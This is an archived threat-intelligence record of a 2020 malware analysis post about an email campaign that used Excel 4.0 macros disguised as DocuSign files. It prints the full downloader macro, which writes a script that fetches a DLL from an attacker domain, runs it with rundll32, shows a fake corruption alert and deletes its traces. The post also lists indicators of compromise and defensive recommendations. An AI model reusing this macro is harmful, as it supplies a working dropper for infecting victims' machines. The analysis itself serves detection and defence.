{ "id": "55161579-fd5d-4648-83ff-149ea2b8ae4a", "created_at": "2026-04-06T00:14:10.160015Z", "updated_at": "2026-04-10T13:13:07.594386Z", "deleted_at": null, "sha1_hash": "a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6", "title": "Yet Another Active Email Campaign With Malicious Excel Files Identified", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 588664, "plain_text": "Yet Another Active Email Campaign With Malicious Excel Files\r\nIdentified\r\nPublished: 2020-03-13 · Archived: 2026-04-05 17:04:59 UTC\r\nWe identified a potential campaign in preparation where the victim would receive a zip file containing a Malicious\r\nExcel file embedding Excel 4.0 Macros — requiring user interaction to infect the victim. We believe this is the\r\nsame group as the one we discussed in February due to high similiarities in the modus operandi. This time again,\r\nthe downloaded DLL would run calc.exe…\r\nDue to the focus on running the Windows Calculator ( calc.exe ) by the group which seems to be preparing a\r\ncampaign, we decided to call this group the CALCGANG . The new stage of this campaign seems to have started on\r\nMarch 5, 2020.\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 1 of 6\n\nMalicious Excel File Impersonating DocuSign\r\nThe chain works as the following:\r\nVictim receives a compressed archive (.xls.zip) file.\r\nOnce opened, the .xls file asks the user to enable macros to allow the document to connect to a remote\r\nserver to send a web request that returns back the malicious macros to be executed. This is quiet ingenious\r\nas it allows some degree of flexibility to the attacker — but also to evade traditional detection since the\r\nmalicious macros would not be inside the file.\r\nThe document pretends to be a DocuSign image.\r\nMalicious macro downloads a dll which gets executed with regsvr32\r\nWeirdly enough, the dll that gets downloaded is a 32-bits dll which __spawnvpe() Windows’s Calculator\r\napplication.\r\nThe sample in question was not present on VirusTotal.\r\nWe found that the distributing domains are hosted on Alibaba Cloud. Details are provided at the end of the blog-post. New domains were registered on Mach 5, 2020.\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 2 of 6\n\nWeb Query Dynamically Retrieving the DLL\r\nOnce the Web Query gets executed, the following macro will be returned to be executed by Microsoft Excel.\r\nUnlike, the February version this one seems slightly more complicated but works the same way.\r\nFOPEN(R[8]C[-2],3)\r\n=FWRITELN(R[-1]C,\"Dim WinHttpReq , oStream\")\r\n=FWRITELN(R[-2]C,\"Set WinHttpReq = CreateObject(\"\"MSXML2.ServerXMLHTTP.6.0\"\")\")\r\n=FWRITELN(R[-3]C,\"WinHttpReq.setOption(2) = 13056\")\r\n=FWRITELN(R[-4]C,\"WinHttpReq.Open \"\"GET\"\", \"\"https://pjtcdnrd.pw/DVnsdvisdv\"\", False\")\r\n=FWRITELN(R[-5]C,\"WinHttpReq.setRequestHeader \"\"User-Agent\"\", \"\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.\r\n=FWRITELN(R[-6]C,\"WinHttpReq.Send\")\r\n=FWRITELN(R[-7]C,\"If WinHttpReq.Status = 200 Then\")\r\n=FWRITELN(R[-8]C,\"Set oStream = CreateObject(\"\"ADODB.Stream\"\")\")\r\n=FWRITELN(R[-9]C,\"oStream.Open\")\r\n=FWRITELN(R[-10]C,\"oStream.Type = 1\")\r\n=FWRITELN(R[-11]C,\"oStream.Write WinHttpReq.ResponseBody\")\r\n=FWRITELN(R[-12]C,\"oStream.SaveToFile \"\"\"\u0026R[-5]C[-2]\u0026\"\"\", 2\")\r\n=FWRITELN(R[-13]C,\"oStream.Close\")\r\n=FWRITELN(R[-14]C,\"End If\")\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 3 of 6\n\n=FCLOSE(R[-15]C)\r\n=EXEC(\"explorer.exe \"\u0026R[-8]C[-2]\u0026\"\")\r\n=WAIT(NOW()+\"00:00:05\")\r\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\r\n=FOPEN(R[-10]C[-2],3)\r\n=FWRITELN(R[-1]C,\"Set obj = GetObject(\"\"new:C08AFD90-F2A1-11D1-8455-00A0C91F3880\"\")\")\r\n=FWRITELN(R[-2]C,\"obj.Document.Application.ShellExecute \"\"rundll32.exe\"\",\"\" \"\u0026R[-14]C[-2]\u0026\",DllRegisterServer\"\",\r\n=FCLOSE(R[-3]C)\r\n=EXEC(\"explorer.exe \"\u0026R[-14]C[-2]\u0026\"\")\r\n=FILE.DELETE(R[-16]C[-2])\r\n=CLOSE(FALSE)\r\nMalicious Macro Code\r\nIt is unclear at this point if the attackers are just doing some scoping \u0026 testing on an upcoming campaign.\r\nMalicious DLL executing __spawnvpe( calc )\r\nRSDS Section\r\nOriginal DLL name appears to be calc.dll, according to the PDB Debugging Path String\r\nC:\\Cigital\\Tools\\calc_security_poc\\dll\\dll\\Release\\calc.pdb\r\nThe dll code looks very similar to another dll available on available on GitHub. Just like last month, it seems that\r\nthe CALCGANG loves to use publicly available examples for their tests.\r\nThis could be that attackers are in training and learning how to spam and infect victims, or also that those servers\r\nwill be rotated with more malicious contents. It is also unclear if this campaign is connected to Dudear.\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 4 of 6\n\nVirusTotal and the DLL\r\nDetection on VirusTotal is still pretty low (non existent) at the time of writing the article.\r\nAt the time of writing this article another security researcher also noticed that the CALCGANG started to used\r\nDocuSign for their documents:\r\nAnother interesting fact is that it seems that several files containing the domain name have been dropped in\r\nCrowdStrike Falcon Sandbox (Hybrid Analysis) since the creation of the domain name - but it does not seem to be\r\ndetected at all by any vendors.\r\nKey Recommendations:\r\nDo not enable macros on files from unknown senders\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 5 of 6\n\nAlways be suspicious of legacy office files such as .XLS, .DOC or .RTF.\r\nMake sure to have memory analysis as part of your incident response strategy to detect and assess potential\r\ninfections on hosts. We can help you with our automated platform and utilities.\r\nConsider using Application Guard for Microsoft Office.\r\nFollow us on Twitter/ LinkedIn to stay informed about emerging campaigns and techniques.\r\nIndicator of compromise (IoC):\r\nExcel File Hashes:\r\n9E730ACE03BB5A2C18A3EDD25E31C1FAFA02F751A06A467E13C778F2632C4771\r\nB62CC06350B71F22363E2A7AC0A1E8389CA39DF08C60A41E27D60124D24EE2A1\r\nAdditional hashes from Hybrid Analysis:\r\nc443f2defea919d292e429ab4a78cd243bb6d588a0b6043d3026a62108f9fd62\r\n92db28d09178a32a5a306726a17c8f0734daa873d63f05cf1eb6037027e4f436\r\n38b6637c82246df63eb8312f425704979c3eab1977d668d9bbeaa67242e8d56f\r\n56095222c95b61a3a4ad7cafb24b369721f36434bff6011a0d4d36bcb5c49440\r\n2025dbd77e2b689fb2325cab54ea8c25fbd5c4d65e12ff4451de94f476c2bf76\r\nMalicious DLL\r\nC25812F5C1B6F74EC686A928461601C305DA29E6C36BBDCE0637CC44D30F2C19\r\nDomain Names \u0026 Servers:\r\nDomains are sharing a common IP address, and to are hosted in Alibaba Cloud.\r\npjtcdnrd.pw (Registered On 2020-03-05)\r\n161.117.177.248\r\nSource: https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nhttps://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/" ], "report_names": [ "2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified" ], "threat_actors": [ { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434450, "ts_updated_at": 1775826787, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6.pdf", "text": "https://archive.orkl.eu/a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6.txt", "img": "https://archive.orkl.eu/a9cbddb3fdaa1f1ddc56f274b3b490e14a1593b6.jpg" } }